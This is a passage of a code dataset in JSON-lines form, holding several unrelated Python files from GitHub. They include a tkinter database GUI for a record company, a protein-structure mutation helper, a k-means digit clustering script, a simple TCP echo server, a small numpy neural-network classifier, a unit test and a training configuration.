fg='white').place(relx = 0.5, rely = 0.1, anchor = 'center')\n menuBtn = tk.Button(prepFrame, text = \"Menu\", font = middleFont, command = back2Menu, bg = 'black', fg='white').place(relx = 0.05, rely = 0.05)\n \n #Queries\n text1 = ''' Update every contract for one month '''\n query1 = ''' UPDATE contract SET end_date = DATE_ADD(end_date, INTERVAL 1 MONTH); '''\n QueryDesc(text1, query1, 0.2)\n \n text2 = ''' Number of members in each band (more than 1 member) '''\n query2 = ''' SELECT A.name, COUNT(M.fname) FROM artist AS A, Member_Has_Artist as MA, member as M WHERE A.artist_ID = MA.artist_ID AND MA.person_AFM = M.person_AFM GROUP BY A.artist_ID HAVING COUNT(M.fname) > 1 ORDER BY COUNT(fname) DESC; '''\n QueryDesc(text2, query2, 0.3)\n \n text3 = ''' Songs of each album '''\n query3 = ''' SELECT A.name, S.title FROM album AS A JOIN song AS S ON A.album_ID = S.album_ID ORDER BY A.name; '''\n QueryDesc(text3, query3, 0.4)\n\n text4 = ''' Albums that will be released in this year '''\n dropIndex = ''' ALTER TABLE album DROP INDEX relDateIndex; '''\n index = ''' CREATE INDEX relDateIndex ON album (released_date); '''\n query4 = ''' SELECT name, released_date FROM album WHERE YEAR(released_date) = YEAR(CURDATE()) ORDER BY released_date; '''\n QueryDesc(text4, query4, 0.5)\n\n text5 = ''' Collaborators whose contract ends in less than two years from now '''\n query5 = ''' SELECT Col.person_AFM, Col.fname, Col.lname, Con.end_date FROM collaborator AS Col, contract AS Con, Col_Signs_Contract AS ColCon WHERE Col.person_AFM = ColCon.person_AFM AND Con.contract_ID = ColCon.contract_ID AND DATEDIFF(end_date, CURDATE()) <= 730 ORDER BY DATEDIFF(end_date, CURDATE()); '''\n QueryDesc(text5, query5, 0.6)\n\n text6 = ''' Studio engineers that worked for each album '''\n query6 = ''' SELECT E.fname, E.lname, T.type, S.name FROM studio_engineer AS E, se_type AS T, SE_Has_SEType AS ET, studio AS S, SE_WorksAt_Studio AS ES WHERE E.se_AFM = ET.se_AFM AND T.se_type_ID = ET.se_type_ID AND S.studio_ID = ES.studio_ID AND E.se_AFM = ES.se_AFM; '''\n QueryDesc(text6, query6, 0.7)\n \n text7 = ''' 10 most expensive studios and the studio engineers who work there '''\n query7 = ''' SELECT S.name, S.price_per_hour, SE.fname, SE.lname FROM studio AS S, studio_engineer AS SE, SE_WorksAt_Studio AS SES WHERE SE.se_AFM = SES.se_AFM AND S.studio_ID = SES.studio_ID ORDER BY price_per_hour DESC LIMIT 10; '''\n QueryDesc(text7, query7, 0.8)\n\n text8 = ''' All studios with price per hour less than 800$\\nthat are not available after October 2023 '''\n query8 = ''' SELECT name, price_per_hour, available_start, available_end FROM studio WHERE price_per_hour < 800 AND MONTH(available_start) = 10 AND YEAR(available_end) <= 2023; '''\n QueryDesc(text8, query8, 0.9)\n\n\ndef back2MenuInsert():\n raiseFrame(menuFrame)\n insertSuccessStrV.set('')\n insertFailureStrV.set('')\n \n\ndef back2MenuDelete():\n raiseFrame(menuFrame)\n deleteSuccessStrV.set('')\n deleteFailureStrV.set('')\n\n \ndef back2MenuTable():\n raiseFrame(menuFrame)\n trv.destroy()\n tableBtn.destroy()\n \n \ndef back2Menu():\n raiseFrame(menuFrame) \n\n \ndef back2NewMember():\n raiseFrame(memberFrame)\n\ndef go2ContArt():\n raiseFrame(contArtFrame)\n \ndef back2DeleteMember():\n raiseFrame(delMemberFrame)\n \n \ndef createGUI():\n \n title0 = tk.Label(menuFrame, text = \"RECORD COMPANY\", font = titleFont, bg = 'black', fg='white').place(relx = 0.5, rely = 0.1, anchor = 'center')\n \n choice1 = tk.Button(menuFrame, text = \"View ER Diagram\", font = middleFont, command = viewErd, bg = 'black', fg='white').place(relx = 0.5, rely = 0.2, anchor = 'center')\n \n choice2 = tk.Button(menuFrame, text = \"View Relational Schema\", font = middleFont, command = viewRelSchema, bg = 'black', fg='white').place(relx = 0.5, rely = 0.3, anchor = 'center') \n \n choice3 = tk.Button(menuFrame, text = \"Write Query\", font = middleFont, command = commandLine, bg = 'black', fg='white').place(relx = 0.5, rely = 0.4, anchor = 'center')\n \n choice4 = tk.Button(menuFrame, text = \"Select Function\", font = middleFont, command = preparedQueries, bg = 'black', fg='white').place(relx = 0.5, rely = 0.5, anchor = 'center') \n \n choice5 = tk.Button(menuFrame, text = \"Add New Member\", font = middleFont, command = addMember, bg = 'black', fg='white').place(relx = 0.5, rely = 0.6, anchor = 'center')\n \n choice6 = tk.Button(menuFrame, text = \"Delete Member\", font = middleFont, command = deleteMember, bg = 'black', fg='white').place(relx = 0.5, rely = 0.7, anchor = 'center')\n \n statusTitle = tk.Label(menuFrame, text = \"Status: \", font = middleFont, bg = 'black', fg = 'white').place(relx = 0.75, rely = 0.8)\n \n team = tk.Label(menuFrame, text = \"Team #08\\nEvangelia Gkagka\\nDimitrios Makris\", font = middleFont, bg = 'black', fg = 'white').place(relx = 0.18, rely = 0.84, anchor = 'center')\n \n statusBox = tk.Text(menuFrame, height = 3, width = 25, bg = 'black', fg = 'white', font = smallFont)\n statusBox.place(relx = 0.75, rely = 0.83)\n status = db.status\n statusBox.insert('end', status)\n statusBox.config(highlightthickness = 0, borderwidth=0)\n statusBox.config(state = 'disable') #read_only\n \n raiseFrame(menuFrame)\n root.mainloop()\n \n\n \n \nif __name__ == \"__main__\":\n \n #Connection with DB\n curDb = 'discography_company'\n db = DbConnection(curDb)\n\n #Root Window\n root = tk.Tk()\n root.geometry(\"1024x768\")\n root.resizable(0, 0)\n root.title(\"Discography Company Database\")\n\n #Frames\n menuFrame = tk.Frame(root, width = 1024, height = 768, bg = 'black')\n prepFrame = tk.Frame(root, width = 1024, height = 768, bg = 'black')\n cmdFrame = tk.Frame(root, width = 1024, height = 768, bg = 'black')\n resultFrame = tk.Frame(root, width = 1024, height = 768, bg = 'black')\n erdFrame = tk.Frame(root, width = 1024, height = 768, bg = 'black')\n schemaFrame = tk.Frame(root, width = 1024, height = 768, bg = 'black')\n memberFrame = tk.Frame(root, width = 1024, height = 768, bg = 'black')\n contArtFrame = tk.Frame(root, width = 1024, height = 768, bg = 'black')\n delMemberFrame = tk.Frame(root, width = 1024, height = 768, bg = 'black')\n resultTestFrame = tk.Frame(root, width = 1024, height = 768, bg = 'black')\n membersFrame = tk.Frame(root, width = 1024, height = 768, bg = 'black')\n tableFrame = tk.Frame(root, width = 1024, height = 768, bg = 'black')\n \n for frame in (menuFrame, cmdFrame, prepFrame, resultFrame, erdFrame, schemaFrame, memberFrame, contArtFrame, delMemberFrame, resultTestFrame, membersFrame, tableFrame):\n frame.grid(row=0, column=0)\n\n menuFrame.pack_propagate(0)\n prepFrame.pack_propagate(0)\n cmdFrame.pack_propagate(0)\n resultFrame.pack_propagate(0)\n erdFrame.pack_propagate(0)\n schemaFrame.pack_propagate(0)\n memberFrame.pack_propagate(0)\n contArtFrame.pack_propagate(0)\n delMemberFrame.pack_propagate(0)\n resultTestFrame.pack_propagate(0)\n membersFrame.pack_propagate(0)\n tableFrame.pack_propagate(0)\n\n\n #Fonts\n titleFont = ('Calibri', 20)\n largeFont = ('Calibri', 18)\n middleFont = ('Calibri', 14)\n smallFont = ('Calibri', 12)\n commentFont = ('Calibri', 10)\n \n #Colors\n slate = '#26282A'\n \n #Functions\n\n #GUI\n createGUI()\n \n #Close Connection with Db\n db.close()","repo_name":"evangeliagaga/DatabasesProject_Team08","sub_path":"SourceCode/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":27633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27535624700","text":"import pdbfixer\nimport tempfile\nfrom openmm.app import PDBFile\nimport openmm.app as app\n\n\ndef gen_pdb_mutate(path_data, pdb_id, chain, mut_info, mut_resid):\n \"\"\"This function mutates the wild residue type to mutant residue and fix the pdb block accordingly. This function\n uses PDBFixer \"\"\"\n temp_file = path_data + pdb_id.lower() + '.pdb'\n fixer0 = pdbfixer.PDBFixer(filename=temp_file)\n\n fixer0.findMissingResidues()\n # only add missing residues in the middle of the chain, do not add terminal ones\n chains = list(fixer0.topology.chains())\n keys = fixer0.missingResidues.keys()\n missingResidues = dict()\n for key in keys:\n chainA = chains[key[0]]\n if not (key[1] == 0 or key[1] == len(list(chainA.residues()))):\n missingResidues[key] = fixer0.missingResidues[key]\n fixer0.missingResidues = missingResidues\n\n fixer0.findMissingAtoms()\n fixer0.addMissingAtoms()\n PDBFile.writeFile(fixer0.topology, fixer0.positions, open(temp_file, 'w'), keepIds=True)\n #print(pdb_id.lower(), chain, mut_info)\n temp_mutfile = path_data + pdb_id.lower() + '_' +chain+ '_' + mut_info +'.pdb'\n #print(temp_mutfile)\n '''if os.path.exists(temp_mutfile):\n return'''\n fixer = pdbfixer.PDBFixer(filename=path_data + pdb_id.lower() + '.pdb')\n fixer.applyMutations([mut_info], chain)\n\n fixer.findMissingResidues()\n # only add missing residues in the middle of the chain, do not add terminal ones\n chains = list(fixer.topology.chains())\n keys = fixer.missingResidues.keys()\n missingResidues = dict()\n for key in keys:\n chain = chains[key[0]]\n if not (key[1] == 0 or key[1] == len(list(chain.residues()))):\n missingResidues[key] = fixer.missingResidues[key]\n fixer.missingResidues = missingResidues\n\n #fixer.findMissingAtoms()\n #fixer.addMissingAtoms()\n with tempfile.NamedTemporaryFile(mode='w+') as temp_pdb:\n app.PDBFile.writeFile(fixer.topology, fixer.positions, temp_pdb)\n temp_pdb.flush()\n PDBFile.writeFile(fixer.topology, fixer.positions, open(temp_mutfile, 'w'), keepIds=True)\n","repo_name":"ShahidIqb/PROST-3D","sub_path":"mutate_pdb.py","file_name":"mutate_pdb.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"3309549169","text":"from sklearn import svm\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport csv\nimport random as rd\nimport time\nimport pickle\nimport copy\n\ndef load_data(PATH):\n \"\"\" @brief load the data of the data set \n @param PATH : string, relative path of the .csv file\n \n @return np array(n) labels : array of n labels\n @return np array(n) images : array of n images\"\"\"\n\n with open(PATH) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n images = []\n labels = []\n for row in csv_reader:\n images.append(np.array(row[0:len(row)-1]).astype(np.float))\n labels.append(row[-1])\n return(np.array(labels),np.array(images))\n\ndef init_centroids_random(k, data):\n \"\"\" @brief initialize centroids by taking k random points in the dataset \n @param k : number of centroids to generate\n @param data: np array(k,m), images forming the dataset\n \n @return np array (k, n) : array of k centroids\"\"\"\n\n centroid_indexes = np.floor(np.random.random_sample((k,))*len(data)).astype(int)\n return np.take(data,centroid_indexes, axis=0)\n\ndef init_centroids_each_class(k, data, labels):\n \"\"\" @brief initialize centroids by taking the first point of each class in the dataset \n\n @param k : number of centroids to generate\n @param data: np array(n,m), images forming the dataset\n @param labels: np array(n), the labels corresponding to the dataset\n \n @return np array (k, m) of k centroids\"\"\"\n\n centroid_indexes= np.empty(k)\n for i in range(k):\n centroid_indexes[i] = np.where(labels == str(i))[0][0]\n\n centroid_indexes = centroid_indexes.astype(int)\n centroids = np.take(data,centroid_indexes, axis=0)\n\n return centroids\n\ndef compute_clusters(centroids, data):\n \"\"\" @brief agregate all the points in the dataset into clusters\n\n @param centroids: np array (k,m) of k points acting as cluster centroids\n @param data: np array(n,m), images forming the dataset\n \n @return np array (n) of assigned cluster for each data point\"\"\"\n\n clusters = np.empty(len(data))\n for i, image in enumerate(data):\n diff = centroids-image\n distances = np.sum(diff*diff, axis=1)\n clusters[i] = np.argmin(distances)\n\n return clusters\n\ndef comp_new_centroids(k, data, clusters):\n \"\"\" @brief compute new centroids by averaging all the images in a cluster\n\n @param k: number of centroids to generate\n @param data: np array (n) of assigned cluster for each data point\n \n @return np array (k, m) of k new centroids\"\"\"\n\n centroids = np.empty((k, len(data[0])))\n for i in range(k):\n cluster_indexes = np.where(clusters == i)[0]\n cluster_data = np.take(data, cluster_indexes, axis=0)\n centroids[i] = np.mean(cluster_data, axis=0)\n\n return centroids\n\ndef compute_confusion_matrix(k,data,labels,clusters):\n \"\"\" @brief Compute the confusion matrix from results obtained on a testing data set\n\n @param k: number of classes (or clusters)\n @param data : np.array (n), testing data set\n @param labels : np.array (n), labels of the testing data set\n @param clusters: np array (n) of assigned cluster for each data point\n \n @return np array (k,k), confusion matrix\"\"\"\n\n counters = np.zeros((k,k))\n for i,index in enumerate(clusters):\n counters[int(labels[i]),int(index)]+=1\n \n for i in range(k):\n argmax_c = np.argmax(counters[:,i])\n max_c = np.max(counters[:,i])\n sum_c = np.sum(counters[:,i])\n\n print(\"Predicted class \"+str(i)+\" : \")\n print(\"most common element : \"+str(argmax_c)+ \" (\" + str(max_c) + \" of \" + str(sum_c)+\")\")\n \n return(counters)\n\ndef plot_confusion_matrix(numbers, cm, title='Confusion matrix', cmap=plt.cm.RdPu):\n \"\"\" @brief Plot the confusion matrix\n\n @param numbers: list(k), labels of the classes to be put on the side of the matrix\n @param cm : np.array (k,k), confusion matrix\"\"\"\n \n plt.figure()\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(numbers))\n plt.xticks(tick_marks, numbers)\n plt.yticks(tick_marks, numbers)\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n plt.show()\n\ndef compute_image(row):\n \"\"\" @brief compute the nxn matrix of the image contained in a l² items array\n\n @param row : np array(l²), array containing the image\n \n @return np array (l, l), matrix representing the image \"\"\"\n\n l = int(np.sqrt(len(row)))\n picture = np.empty((l,l))\n for i in range(l):\n picture[i,:] = row[i*l:(i+1)*l]\n\n return(picture)\n\ndef compute_mean_image(index_cluster,clusters,data):\n \"\"\" @brief Compute the mean image associated to a cluster (or class) of a testing data set\n\n @param index_cluster : index of the cluster\n @param clusters: np array (n) of assigned cluster for each data point\n @param data : np.array (n), testing data set\n \n @return np array (l, l), matrix representing the mean image \"\"\"\n\n l = int(np.sqrt(len(data[0])))\n M = np.zeros((l,l))\n c=0\n\n for index in clusters:\n if(index==index_cluster):\n c+=1\n\n for i,index in enumerate(clusters):\n if(index==index_cluster):\n M += compute_image(data[i])/c\n \n return(M)\n\ndef plot_mean_images(numbers, clusters,data):\n \"\"\" @brief Plot the mean image associated to a cluster (or class) of a testing data set\n\n @param numbers: list(k), labels of the classes to be put on the each mean image\n @param clusters: np array (n) of assigned cluster for each data point\n @param data : np.array (n), testing data set\"\"\"\n\n fig = plt.figure(figsize=(10,8))\n A = []\n for i in range(1,len(numbers)):\n A.append(fig.add_subplot(520+i))\n A.append(fig.add_subplot(5,2,10))\n\n for i,a in enumerate(A):\n a.imshow(compute_mean_image(i,clusters,data),cmap='gray')\n a.set_title(numbers[i])\n fig.suptitle(\"Mean image of each cluster\")\n plt.show()\n\ndef main():\n k= 10\n random_init = True\n labels_train, images_train = load_data('optdigits_train.csv')\n labels_test, images_test = load_data('optdigits_test.csv')\n\n if random_init:\n centroids= init_centroids_random(k, images_train)\n else:\n centroids = init_centroids_each_class(k, images_train, labels_train)\n\n old_centroids= np.zeros(centroids.shape)\n\n nb_it = 0\n nb_max_it = 100\n \n while not np.all(centroids == old_centroids) and nb_it < nb_max_it:\n clusters = compute_clusters(centroids, images_train)\n old_centroids = centroids\n centroids = comp_new_centroids(k, images_train, clusters)\n nb_it+=1\n\n print(\"k-mean algorithm was ran in \"+str(nb_it)+\" iterations\")\n\n if random_init:\n #if initialization was done randomly, we try to reorganize the clusters in order to have all zeros in cluster zero\n # all ones in cluster one etc...\n\n # first we find out what if the most represented number in each cluster\n predicted_numbers = np.zeros(k)\n max_counts = np.zeros(k)\n for i in range(k):\n cluster = np.where(clusters == i)[0]\n true_labels = labels_train[cluster]\n unique, counts = np.unique(true_labels, return_counts=True)\n max_counts[i] = np.amax(counts)\n predicted_numbers[i] = unique[np.argmax(counts)]\n\n print(predicted_numbers)\n unique, counts = np.unique(predicted_numbers, return_counts = True)\n\n # if a number is the most represented in several clusters, \n # then we keep the prediction for the best one and assign other numbers to the remaining clusters\n\n while len(unique) != k:\n # finding out which numbers haven't been assigned to any cluster\n missing_elements = np.empty(0)\n for i in range(k):\n if not i in unique:\n missing_elements = np.append(missing_elements, i)\n\n # running through ambiguous clusters, and assigning the worst clusters to the missing elements\n for ambiguous_class in unique[np.where(counts != 1)[0]]:\n ambiguous_class_indexes = np.where(predicted_numbers == ambiguous_class)[0]\n max_counts_ambiguous_class = np.take(max_counts, ambiguous_class_indexes)\n\n for i, candidate_class_index in enumerate(ambiguous_class_indexes):\n if i != np.argmax(max_counts_ambiguous_class):\n predicted_numbers[ambiguous_class_indexes[i]] = np.random.choice(missing_elements)\n \n unique, counts = np.unique(predicted_numbers, return_counts = True)\n\n\n # mapping the old cluster indexes to the new one\n new_clusters = copy.deepcopy(clusters)\n new_centroids = copy.deepcopy(centroids)\n for i in range(k):\n new_clusters[clusters == i] = predicted_numbers[i]\n new_centroids[int(predicted_numbers[i])] = centroids[i]\n\n clusters = new_clusters\n centroids = new_centroids\n\n\n ## prediction\n clusters_test = compute_clusters(centroids, images_test)\n\n numbers = ['0','1','2','3','4','5','6','7','8','9']\n\n matrix = compute_confusion_matrix(k,images_test,labels_test,clusters_test)\n normalized_martix = matrix/matrix.sum(axis=1)\n\n plot_confusion_matrix(numbers,matrix)\n\n plot_confusion_matrix(numbers,normalized_martix, title='Normalized confusion matrix')\n\n plot_mean_images(numbers,clusters_test,images_test)\n\nmain()\n\n","repo_name":"CarolinePascal/ROB311-TP6","sub_path":"TP6.py","file_name":"TP6.py","file_ext":"py","file_size_in_byte":9613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15646198512","text":"import socket\nimport subprocess\nimport confirguri\n\ndef init_server(server_address):\n socket_server=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\n try:\n print(\"[*] Server is trying to bind to address {}:{}\".format(server_address[0], server_address[1]))\n socket_server.bind(server_address)\n print(\"[*] Server has successfuly binded.\")\n except socket.error as serr:\n print(str(serr))\n\n socket_server.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)\n if hasattr(socket,\"SO_REUSEPORT\"):\n socket_server.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEPORT,1)\n\n socket_server.listen(5)\n\n print(\"[*] Server listen at {}:{}\".format(server_address[0],server_address[1]))\n\n try:\n while True:\n client_socket,client_addr=socket_server.accept()\n print(\"[*] Client has connected {}:{}\".format(client_addr[0],client_addr[1]))\n handle(client_socket)\n except KeyboardInterrupt as kerr:\n print(\"[*] Server is closing...\")\n socket_server.close()\n\ndef handle(client_socket):\n MAX_RECV=1024\n\n recv_size=1\n while recv_size:\n data=client_socket.recv(MAX_RECV).decode('utf-8')\n\n if not data:\n print(\"[*] Client just disconected\")\n break\n\n recv_size=len(data)\n client_socket.send(data.encode(\"utf-8\"))\n data=\"\"\n\nif __name__==\"__main__\":\n init_server((\"10.10.2.223\",8080))","repo_name":"PalagesiuCezar/Networking","sub_path":"Telnet/Telnet_server.py","file_name":"Telnet_server.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7664172459","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nclass Model:\r\n def __init__(self):\r\n print(\"self\")\r\n self.cost = Cost()\r\n self.act = Activation()\r\n self.model=[]\r\n\r\n def initialize_parameters_deep(self,layer_dims):\r\n np.random.seed(3)\r\n self.model=layer_dims\r\n parameters = {}\r\n L = len(layer_dims) # number of layers in the network\r\n \r\n for l in range(1, L):\r\n parameters['W' + str(l)] = np.random.randn(layer_dims[l], layer_dims[l - 1]) * 0.01\r\n parameters['b' + str(l)] = np.zeros((layer_dims[l], 1))\r\n assert(parameters['W' + str(l)].shape == (layer_dims[l], layer_dims[l - 1]))\r\n assert(parameters['b' + str(l)].shape == (layer_dims[l], 1))\r\n return parameters\r\n \r\n def linear_forward(self,A, W, b):\r\n \r\n Z = np.dot(W, A) + b \r\n assert(Z.shape == (W.shape[0], A.shape[1]))\r\n cache = (A, W, b)\r\n \r\n return Z, cache\r\n def linear_activation_forward(self,A_prev, W, b, activation):\r\n\r\n if activation == \"sigmoid\":\r\n Z, linear_cache = self.linear_forward(A_prev, W, b)\r\n A, activation_cache = self.act.sigmoid(Z)\r\n \r\n elif activation == \"relu\":\r\n Z, linear_cache = self.linear_forward(A_prev, W, b)\r\n A, activation_cache = self.act.relu(Z)\r\n \r\n elif activation == \"linear\":\r\n Z, linear_cache = self.linear_forward(A_prev, W, b)\r\n A, activation_cache = self.act.linear(Z)\r\n \r\n assert (A.shape == (W.shape[0], A_prev.shape[1]))\r\n cache = (linear_cache, activation_cache)\r\n \r\n return A, cache\r\n\r\n def linear_backward(self,dZ, linear_cache):\r\n A_prev, W, b = linear_cache \r\n m = A_prev.shape[1]\r\n\r\n dW = (1/m)*np.dot(dZ,A_prev.T)\r\n db = (1/m)*np.sum(dZ, axis = 1,keepdims= True)\r\n\r\n dA_prev = np.dot(W.T,dZ)\r\n\r\n return dA_prev,dW,db\r\n\r\n def linear_activation_backward(self,dA, cache, activation):\r\n linear_cache, activation_cache = cache\r\n if activation == \"relu\":\r\n dZ = self.act.relu_backward(dA, activation_cache)\r\n \r\n elif activation == \"sigmoid\":\r\n dZ = self.act.sigmoid_backward(dA, activation_cache)\r\n \r\n \r\n dA_prev, dW, db = self.linear_backward(dZ, linear_cache)\r\n return dA_prev, dW, db\r\n\r\n def update_parameters(self,parameters, grads, learning_rate):\r\n L = len(parameters) // 2 # number of layers in the neural network\r\n for l in range(L):\r\n parameters[\"W\" + str(l + 1)] = parameters[\"W\" + str(l + 1)] - learning_rate * grads[\"dW\" + str(l + 1)]\r\n parameters[\"b\" + str(l + 1)] = parameters[\"b\" + str(l + 1)] - learning_rate * grads[\"db\" + str(l + 1)]\r\n return parameters\r\n\r\n \r\n\r\n \r\nclass Cost:\r\n def __init__(self,loss=\"Cross\"):\r\n print(\"Cost\")\r\n self.loss=loss\r\n \r\n def compute_cost(self,AL, Y):\r\n m = Y.shape[1]\r\n cost=0\r\n if self.loss==\"Cross\":\r\n cost = (-1 / m) * np.sum(np.multiply(Y, np.log(AL)) + np.multiply(1 - Y, np.log(1 - AL)))\r\n cost = np.squeeze(cost) \r\n assert(cost.shape == ())\r\n return cost\r\n\r\n def derive_cost(self,AL, Y):\r\n m = Y.shape[1]\r\n dAL=0\r\n if self.loss==\"Cross\":\r\n dAL = - (np.divide(Y, AL) - np.divide(1 - Y, 1 - AL))\r\n return dAL\r\n \r\n \r\nclass Activation:\r\n def __init__(self,act=\"relu\"):\r\n print(\"Activation\")\r\n self.act=act\r\n\r\n def relu(self,input1):\r\n ANS = np.zeros(input1.shape)\r\n for i in range(0,ANS.shape[0]):\r\n for j in range(0,ANS.shape[1]):\r\n ANS[i,j] = max(0, input1[i,j])\r\n #return ANS , input1 \r\n cache = input1\r\n return ANS , cache \r\n\r\n def sigmoid(self,Z) :\r\n A = 1/(1 + np.exp(-1 * Z))\r\n cache = Z\r\n return A,cache\r\n def linear(self,Z) :\r\n return Z,Z\r\n \r\n def relu_backward(self,dA, Z) :\r\n\r\n grad_relu = np.zeros(Z.shape)\r\n for i in range(Z.shape[0]):\r\n for j in range(Z.shape[1]):\r\n if Z[i,j] >= 0 :\r\n grad_relu[i,j] = 1\r\n else:\r\n grad_relu[i,j] = 0\r\n return dA * grad_relu \r\n\r\n def sigmoid_backward(self,dA, Z):\r\n gard_sigmoid = np.zeros(Z.shape)\r\n out,cache = self.sigmoid(Z) \r\n grad_sigmoid = out*(1-out)\r\n return dA * grad_sigmoid\r\n\r\n\r\nclass Classifier(Model):\r\n def __init__(self):\r\n print(\"Classifier\")\r\n self.cost = Cost()\r\n self.act = Activation()\r\n self.para=[]\r\n self.Loss=[]\r\n Model.__init__(self)\r\n def L_model_forward(self,X, parameters):\r\n\r\n caches = []\r\n A = X\r\n L = len(parameters) // 2 # number of layers in the neural network\r\n \r\n # Implement [LINEAR -> RELU]*(L-1). Add \"cache\" to the \"caches\" list.\r\n for l in range(1, L):\r\n A_prev = A \r\n ### START CODE HERE ### (≈ 2 lines of code)\r\n A, cache = Model.linear_activation_forward(self,A_prev, \r\n parameters['W' + str(l)], \r\n parameters['b' + str(l)], \r\n activation='relu')\r\n caches.append(cache)\r\n \r\n AL, cache = Model.linear_activation_forward(self,A, \r\n parameters['W' + str(L)], \r\n parameters['b' + str(L)], \r\n activation='sigmoid')\r\n caches.append(cache)\r\n \r\n assert(AL.shape == (1, X.shape[1]))\r\n \r\n return AL,caches\r\n def L_model_backward(self,AL, Y, caches):\r\n grads = {}\r\n L = len(caches) # the number of layers\r\n m = AL.shape[1]\r\n Y = Y.reshape(AL.shape) # after this line, Y is the same shape as AL\r\n \r\n \r\n dAL = self.cost.derive_cost(AL,Y)\r\n \r\n \r\n \r\n current_cache = caches[-1]\r\n grads[\"dA\" + str(L)], grads[\"dW\" + str(L)], grads[\"db\" + str(L)] = Model.linear_activation_backward(self,dAL,current_cache,\"sigmoid\")\r\n \r\n for l in reversed(range(L-1)):\r\n current_cache = caches[l]\r\n dA_prev_temp, dW_temp, db_temp = Model.linear_activation_backward(self,dAL,current_cache,\"relu\")\r\n grads[\"dA\" + str(l + 1)] = dA_prev_temp\r\n grads[\"dW\" + str(l + 1)] = dW_temp\r\n grads[\"db\" + str(l + 1)] = db_temp\r\n \r\n return grads\r\n\r\n def Train(self,X, Y, layers_dims, learning_rate=0.075, num_iterations=500, print_cost=False):\r\n np.random.seed(1)\r\n costs = []\r\n param=[]\r\n parameters = Model.initialize_parameters_deep(self,layers_dims)\r\n #print(parameters,X)\r\n for i in range(0, num_iterations):\r\n AL, caches = self.L_model_forward(X, parameters)\r\n cost = self.cost.compute_cost(AL, Y)\r\n \r\n grads = self.L_model_backward(AL, Y, caches)\r\n parameters = self.update_parameters(parameters, grads, learning_rate)\r\n self.Loss.append(cost)\r\n self.para.append(parameters)\r\n param.append(parameters)\r\n if print_cost and i % 100 == 0:\r\n print (\"Cost after iteration %i: %f\" % (i, cost))\r\n if print_cost and i % 100 == 0:\r\n costs.append(cost)\r\n \r\n # plot the cost\r\n plt.plot(np.squeeze(self.Loss))\r\n plt.ylabel('cost')\r\n plt.xlabel('iterations (per tens)')\r\n plt.title(\"Learning rate =\" + str(learning_rate))\r\n plt.show()\r\n\r\n return parameters\r\n\r\ndef predict(X, parameters,model):\r\n\r\n AL,caches = model.L_model_forward(X, parameters)\r\n print(AL)\r\n predictions = AL > 0.5\r\n\r\n return predictions","repo_name":"Varanasi5213/Minor-2","sub_path":"Classifier.py","file_name":"Classifier.py","file_ext":"py","file_size_in_byte":8007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"84473199","text":"from crypta.cm.services.common.data.python.back_reference import TBackReference\nfrom crypta.cm.services.common.data.python.id import TId\n\n\nYANDEXUID_TYPE = \"yandexuid\"\nEXT_NS = \"ext_ns\"\nEXT_NS_2 = \"ext_ns_2\"\n\n\ndef test_empty():\n back_ref = TBackReference(TId(\"\", \"\"), [])\n\n ref_id = TId(\"\", \"\")\n ref_refs = set()\n\n assert ref_id == back_ref.GetId()\n assert ref_refs == back_ref.GetRefs()\n\n\ndef test_full():\n id = TId(YANDEXUID_TYPE, \"100500\")\n ext_ids = {TId(EXT_NS, \"value-1\"), TId(EXT_NS_2, \"value-2\")}\n back_ref = TBackReference(id, ext_ids)\n\n assert id == back_ref.GetId()\n assert ext_ids == back_ref.GetRefs()\n assert id != TId(\"foo\", \"bar\")\n\n\ndef test_equality():\n id_1 = TId(YANDEXUID_TYPE, \"100500\")\n ext_ids_1 = [TId(EXT_NS, \"1500000000\"), TId(EXT_NS_2, \"1600000000\")]\n back_ref_1 = TBackReference(id_1, ext_ids_1)\n back_ref_1_dup = TBackReference(id_1, ext_ids_1)\n\n id_2 = TId(YANDEXUID_TYPE, \"200500\")\n ext_ids_2 = [TId(EXT_NS, \"1500\"), TId(EXT_NS, \"1600\")]\n back_ref_2 = TBackReference(id_2, ext_ids_2)\n\n assert back_ref_1 == back_ref_1\n assert back_ref_1_dup == back_ref_1\n assert back_ref_2 != back_ref_1\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"crypto/test/test_back_reference.py","file_name":"test_back_reference.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17640992405","text":"from pprint import pprint\n\n\n# Default Configs for training\n# NOTE that, config items could be overwriten by passing argument through command line.\n# e.g. --voc-data-dir='./data/'\n\nclass Config:\n # Can be 'voc', 'multiclass', 'oneclass', 'vott', or 'iwildcam'\n dataset = 'vott' \n\n # Not defined her, passed in via train.sh\n train_annotation = '' # ../train_bboxes.json\n val_annotation = '' # ../val_bboxes.json\n image_root = '' # ../images/\n voc_data_dir = '' # ../VOCdevkit/VOC2007/\n train_image_dir = '' # Only for VOTT format\n val_image_dir = '' # Only for VOTT format\n\n validate_only = False\n\n min_size = 600 # image resize\n max_size = 1000 # image resize\n num_workers = 4\n test_num_workers = 4\n\n # sigma for l1_smooth_loss\n rpn_sigma = 3.\n roi_sigma = 1.\n # Whether to weight background by 1 / number proposals in classification of RPN\n reduce_bg_weight = False\n\n # param for optimizer\n # 0.0005 in origin paper but 0.0001 in tf-faster-rcnn\n weight_decay = 0.0005\n lr_decay = 0.1 # 1e-3 -> 1e-4\n lr = 0.0003\n 